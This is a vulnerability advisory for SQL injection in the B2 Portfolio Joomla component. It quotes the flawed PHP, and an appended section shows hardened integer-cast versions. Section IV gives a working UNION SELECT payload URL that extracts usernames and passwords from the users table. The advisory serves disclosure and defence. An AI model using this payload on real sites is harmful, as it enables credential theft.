B2 Portfolio Joomla Component 1.0.0 Multiple SQL Injection Vulnerability

Name:              B2 Portfolio
Vendor:            http://www.pulseextensions.com
Versions Affected: 1.0.0
Author:            Salvatore Fresta aka Drosophila
Website:           http://www.salvatorefresta.net
Contact:           salvatorefresta [at] gmail [dot] com
Date:              2011-01-24

X. INDEX

I.   ABOUT THE APPLICATION
II.  DESCRIPTION
III. ANALYSIS
IV.  SAMPLE CODE
V.   FIX

I. ABOUT THE APPLICATION
________________________

B2 Portfolio is a Joomla component that gives the user the option to view
the details of a portfolio item by zooming it on hover, and allows a full
view by clicking.

II. DESCRIPTION
_______________

Some parameters are not properly sanitised before being used in SQL
queries.

III. ANALYSIS
_____________

Summary:

A) Multiple SQL Injection

A) Multiple SQL Injection
_________________________

The id (read from the c request variable) and wallid parameters are not
properly sanitised before being used in SQL queries. This can be exploited
to manipulate SQL queries by injecting arbitrary SQL code.

The following are the vulnerable functions:

    function getcategoryname()
    {
        $db =& JFactory::getDBO();
        $default_category = JRequest::getVar('c',0);

        if($default_category == "")
        {
            $query_cat = 'SELECT default_category FROM #__b2portfolio_config';
            $db->setQuery( $query_cat );
            $default_category = $db->loadResult();
        }

        $query = 'SELECT * FROM #__b2portfolio_category where id='.$default_category;
        $db->setQuery( $query );
        $cat_data = $this->_db->loadObject($query);
        return $cat_data;
    }

    function click()
    {
        $db =& JFactory::getDBO();
        $date =& JFactory::getDate();
        $trackDate = $date->toFormat( '%Y-%m-%d' );

        $query = 'UPDATE #__b2portfolio set click = ( click + 1 ) where id ='.$_GET['wallid'];
        $db->setQuery( $query );
        $db->query();
    }

In both functions the request value is concatenated directly into the SQL
string: getcategoryname() takes c through JRequest::getVar() with no type
restriction, and click() reads wallid straight from $_GET.

IV. SAMPLE CODE
_______________

A) Multiple SQL Injection

http://site/path/index.php?option=com_b2portfolio&c=-1 UNION SELECT 1,concat(username,0x34,password),3,4,5 FROM jos_users

V. FIX
______

No fix.
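Since no vendor fix was available, the following is an added example (not the vendor's code and not part of the original advisory) showing how the two functions quoted in section III could be hardened. Both injection points take a numeric identifier, so the mitigation is to type the value at the request boundary and cast it again before it reaches the query string. It assumes the Joomla 1.5 API the component already uses (JFactory, JRequest, the JDatabase object); the table and column names come from the advisory, and the function names with the _fixed suffix are an assumption for illustration.

```php
<?php
// Added example, not the vendor's code: hardened forms of the two
// functions quoted in the advisory. Assumes the Joomla 1.5 API used by
// the original component (JFactory, JRequest, JDatabase); table and
// column names are taken from the advisory, function names are ours.

function getcategoryname_fixed()
{
    $db =& JFactory::getDBO();

    // The category id is numeric, so enforce that at the boundary.
    // JRequest::getInt() yields 0 for anything that is not an integer,
    // so a value like "-1 UNION SELECT ..." can never reach the query.
    $default_category = JRequest::getInt('c', 0);

    if ($default_category === 0) {
        $query_cat = 'SELECT default_category FROM #__b2portfolio_config';
        $db->setQuery($query_cat);
        $default_category = (int) $db->loadResult();
    }

    // Cast again where the value is interpolated, so the statement can
    // only ever contain an integer literal regardless of its source.
    $query = 'SELECT * FROM #__b2portfolio_category WHERE id = ' . (int) $default_category;
    $db->setQuery($query);

    // The original called $this->_db->loadObject($query); loadObject()
    // takes no argument in Joomla 1.5 and runs the query already set.
    return $db->loadObject();
}

function click_fixed()
{
    $db =& JFactory::getDBO();

    // Read wallid through JRequest rather than $_GET so the value is
    // typed, and skip the UPDATE entirely when no valid id is supplied.
    $wallid = JRequest::getInt('wallid', 0);
    if ($wallid <= 0) {
        return false;
    }

    $query = 'UPDATE #__b2portfolio SET click = (click + 1) WHERE id = ' . (int) $wallid;
    $db->setQuery($query);
    return $db->query();
}
```

With these changes the request in section IV resolves to `WHERE id = 0` in the category lookup, and a non-numeric wallid never triggers an UPDATE at all. Casting to int is the right tool only because both columns are integer keys; for string parameters the equivalent boundary is $db->Quote() or a prepared statement, not an integer cast.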